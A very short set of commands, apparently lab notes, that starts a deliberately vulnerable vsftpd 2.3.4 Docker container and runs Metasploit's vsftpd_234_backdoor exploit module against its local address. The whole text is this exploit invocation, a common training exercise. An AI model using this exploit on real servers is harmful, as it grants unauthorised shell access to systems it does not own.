docker run --name vsftpd-2.3.4 -it clintmint/vsftpd-2.3.4:1.0 sh -c "start-vsftpd && sh" msfconsole use exploit/unix/ftp/vsftpd_234_backdoor set RHOSTS 172.17.0.2 exploit